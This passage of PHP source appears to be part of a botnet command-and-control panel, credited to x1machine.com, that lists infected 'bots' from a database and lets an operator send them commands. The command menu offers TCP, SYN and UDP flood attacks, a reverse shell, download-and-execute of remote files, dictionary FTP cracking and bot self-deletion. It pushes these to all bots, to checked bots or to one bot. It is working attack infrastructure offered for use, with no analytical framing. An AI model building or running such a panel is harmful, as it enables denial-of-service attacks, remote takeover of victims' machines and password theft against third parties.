  688. $res = mysql_query("SELECT ip FROM $table");
  689. while ($row = mysql_fetch_assoc($res)) {
  690. print("<OPTION value=".$row[ip].">".$row[ip]."</OPTION>");
  691. }
  692. echo "</SELECT>
  693. </td>
  694. </tr>";
  695. echo "<tr>
  696. <td><font color='orange'><small>Port:</small></font></td>
  697. <td><input type='text' name='remo_port' value='' size='50'></td>
  698. </tr>
  699. <tr><td></td><td><input type='submit' value='Set Configuration' name='set_current_config'> <input type='reset' name='Submit2' value='Clear'></td></tr>
  700. ";
  701. echo "</form></table></center>
  702. <center><font size='1'>&copy www.x1machine.com</font></center>
  703. </div></center>
  704. </body></html>";
  705. if(!is_null($_POST['set_current_config'])){
  706. $ip = htmlspecialchars(addslashes($_POST['botip']));
  707. $port = htmlspecialchars(addslashes($_POST['remo_port']));
  708. if($ip && $port){
  709. $res = mysql_query("SELECT ip FROM $table_erte_configuration");
  710. $total_entries = mysql_num_rows($res);
  711. if($total_entries > 0){
  712. mysql_query("UPDATE $table_erte_configuration SET ip = '$ip', port = '$port'");
  713. echo "<script>location=\"index.php\";</script>";
  714. } else {
  715. mysql_query("INSERT INTO $table_erte_configuration (ip, port) VALUES ('$ip', '$port')");
  716. echo "<script>location=\"index.php\";</script>";
  717. }
  718. }
  719. }
  720. exit();
  721. }
  722. ?>
  723. <tr>
  724. <td><font color="orange"><small>Bot Name:</small></font></td>
  725. <td>
  726. <!--
  727. <form name="form1" method="post" action="" enctype="multipart/form-data">
  728. -->
  729. <SELECT name="botip" style="width:365px">
  730. <?php
  731. if($_GET['page'] == "stats") {
  732. echo "<OPTION value='all'>All</OPTION>";
  733. echo "<OPTION value='checked'>Checked</OPTION>";
  734. }
  735. $res = mysql_query("SELECT name FROM $table");
  736. while ($row = mysql_fetch_assoc($res)) {
  737. print("<OPTION value=".$row[name].">".$row[name]."</OPTION>");
  738. }
  739. ?>
  740. </SELECT>
  741. </td>
  742. </tr>
  743. <tr><td><font color="orange"><small>Command:</small></font></td>
  744. <td>
  745. <SELECT name="newcmd" style="width:365px">
  746. <OPTION value="sleep" selected>Sleep-[time(in secs)]</OPTION>
  747. <OPTION value="ddos">TCP Storm-[Host]-[Port]-[Delay(0/1)]-[Packets]</OPTION>
  748. <OPTION value="syn">SYN Storm-[Host]-[Port]-[Delay(0/1)]-[Packets]</OPTION>
  749. <OPTION value="udpstorm">UDP Storm-[Host]-[Port]-[Time(sec)]-[Delay(0/1)]</OPTION>
  750. <OPTION value="selfdel">Delete Bot from remote machine</OPTION>
  751. <OPTION value="revsh">Reverse Shell-[Host]-[Port]</OPTION>
  752. <OPTION value="remterm">E.R.T.E.-[Bot's Port]</OPTION>
  753. <OPTION value="ftpcrack">FTP Crack -[Ftp Host]</OPTION>
  754. <OPTION value="dl_exec">Download &amp; Execute -[Remote Host]-[Path 2 File]-[Local File]</OPTION>
  755. </SELECT>
  756. </td></tr>
  757. <tr>
  758. <td><font color="orange"><small>Argument 1:</small></font></td>
  759. <td><input type="text" name="arg1" value="" size="50"></td>
  760. </tr>
  761. <tr>
  762. <td><font color="orange"><small>Argument 2:</small></font></td>
  763. <td><input type="text" name="arg2" value="" size="50"></td>
  764. </tr>
  765. <tr>
  766. <td><font color="orange"><small>Argument 3:</small></font></td>
  767. <td><input type="text" name="arg3" value="" size="50"></td>
  768. </tr>
  769. <tr>
  770. <td><font color="orange"><small>Argument 4:</small></font></td>
  771. <td><input type="text" name="arg4" value="" size="50"></td>
  772. </tr>
  773. <tr><td></td><td><input type="submit" value="Set Command" name="set"> <input type="reset" name="Submit2" value="Clear"></td></tr>
  774. </form>
  775. <?php
  776. if(!is_null($_POST['set'])){
  777. $newcmd = htmlspecialchars(addslashes($_POST['newcmd']."!".$_POST['arg1']."!".$_POST['arg2']."!".$_POST['arg3']."!".$_POST['arg4']));
  778. $crycmd = $newcmd;
  779. $botip = htmlspecialchars(addslashes($_POST['botip']));
  780. dbconnection($host, $login, $password, $database);
  781. if($botip == "all"){
  782. if($_POST['newcmd'] == "ftpcrack"){
  783. echo "Selecting all bots for this command is not implemented!</table></center>
  784. <center><font size='1'>&copy www.x1machine.com</font></center>
  785. </div></center></body></html>";
  786. exit();
  787. }
  788. mysql_query("UPDATE $table SET cmd='$crycmd'");
  789. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  790. } else if ($botip == "checked"){
  791. if($_POST['newcmd'] == "ftpcrack"){
  792. echo "Selecting checked bots for this command is not implemented!</table></center>
  793. <center><font size='1'>&copy www.x1machine.com</font></center>
  794. </div></center></body></html>";
  795. exit();
  796. }
  797. $box = $_POST['box'];
  798. foreach ( $box as $k=> $c)
  799. {
  800. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$c'");
  801. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  802. }
  803. } else {
  804. if($_POST['newcmd'] == "ftpcrack"){
  805. $ips = $_POST['arg1'];
  806. $ports = ""; $dict_file = "";
  807. $res = mysql_query("SELECT * FROM $ftp_table WHERE ip = '$ips'");
  808. while ($row = mysql_fetch_assoc($res)) {
  809. $ports = $row[port]; $dict_file = $row[dict];
  810. }
  811. $newcmd = "ftpcrack!".$ips."!".$ports."!".$dict_file;
  812. $crycmd = $newcmd ;
  813. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$botip'");
  814. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  815. } else {
  816. mysql_query("UPDATE $table SET cmd='$crycmd' WHERE name='$botip'");
  817. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  818. }}
  819. }
  820. ?>
  821. </table></center>
  822. <center><font size='1'>&copy www.x1machine.com</font></center>
  823. </div></center>
  824. </body></html>